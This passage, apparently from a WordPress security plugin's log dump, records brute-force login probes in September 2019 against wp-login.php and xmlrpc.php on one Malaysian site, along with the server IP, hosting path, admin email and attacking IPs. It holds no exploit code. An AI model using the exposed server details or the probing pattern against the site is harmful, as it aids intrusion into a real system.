Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrVViJ7D9Gn7wDPh8j1AAAAMQ\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"89.145.74.91\";s:11:\"REMOTE_PORT\";s:5:\"53347\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrVViJ7D9Gn7wDPh8j1AAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569074005.476\";s:12:\"REQUEST_TIME\";s:10:\"1569074005\";}}','notice','2019-09-21 13:53:26','2019-09-21 13:53:25',18364352,19661200,'https://bintara.com.my/2019/xmlrpc.php',1,0,'89.145.74.91'),(26060,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrZjDrcQxTmGrCWuaTdQAAAcU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.163.230.76\";s:11:\"REMOTE_PORT\";s:5:\"56080\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrZjDrcQxTmGrCWuaTdQAAAcU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074022.9087\";s:12:\"REQUEST_TIME\";s:10:\"1569074022\";}}','notice','2019-09-21 13:53:44','2019-09-21 13:53:43',17848632,19338864,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.163.230.76'),(26061,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrarfBTP0kPOVnb8jwNQAAAFM\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.163.230.76\";s:11:\"REMOTE_PORT\";s:5:\"57698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrarfBTP0kPOVnb8jwNQAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074026.3065\";s:12:\"REQUEST_TIME\";s:10:\"1569074026\";}}','notice','2019-09-21 13:53:47','2019-09-21 13:53:46',18358832,19655184,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'192.163.230.76'),(26062,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrdViJ7D9Gn7wDPh8j6AAAAM8\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.239.113\";s:11:\"REMOTE_PORT\";s:5:\"37399\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrdViJ7D9Gn7wDPh8j6AAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074038.0977\";s:12:\"REQUEST_TIME\";s:10:\"1569074038\";}}','notice','2019-09-21 13:53:59','2019-09-21 13:53:58',17848240,19338088,'https://bintara.com.my/test/wp-login.php',1,0,'188.166.239.113'),(26063,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYreHkXpgmG5P@iB8k3hgAAAII\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.239.113\";s:11:\"REMOTE_PORT\";s:5:\"37611\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYreHkXpgmG5P@iB8k3hgAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074040.7593\";s:12:\"REQUEST_TIME\";s:10:\"1569074040\";}}','notice','2019-09-21 13:54:02','2019-09-21 13:54:01',18363536,19660384,'https://bintara.com.my/test/xmlrpc.php',1,0,'188.166.239.113'),(26064,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrnnkXpgmG5P@iB8k3ygAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.76.155.243\";s:11:\"REMOTE_PORT\";s:5:\"59942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrnnkXpgmG5P@iB8k3ygAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074078.6459\";s:12:\"REQUEST_TIME\";s:10:\"1569074078\";}}','notice','2019-09-21 13:54:39','2019-09-21 13:54:38',17845912,19336192,'https://bintara.com.my/wp/wp-login.php',1,0,'13.76.155.243'),(26065,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYroViJ7D9Gn7wDPh8j-AAAANc\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.76.155.243\";s:11:\"REMOTE_PORT\";s:5:\"60464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYroViJ7D9Gn7wDPh8j-AAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074081.1249\";s:12:\"REQUEST_TIME\";s:10:\"1569074081\";}}','notice','2019-09-21 13:54:42','2019-09-21 13:54:41',18364288,19659776,'https://bintara.com.my/wp/xmlrpc.php',1,0,'13.76.155.243'),(26066,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrwHkXpgmG5P@iB8k35QAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.15.209.93\";s:11:\"REMOTE_PORT\";s:5:\"44170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrwHkXpgmG5P@iB8k35QAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074112.6101\";s:12:\"REQUEST_TIME\";s:10:\"1569074112\";}}','notice','2019-09-21 13:55:13','2019-09-21 13:55:13',17848328,19340808,'https://bintara.com.my/2019/wp-login.php',1,0,'51.15.209.93'),(26067,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 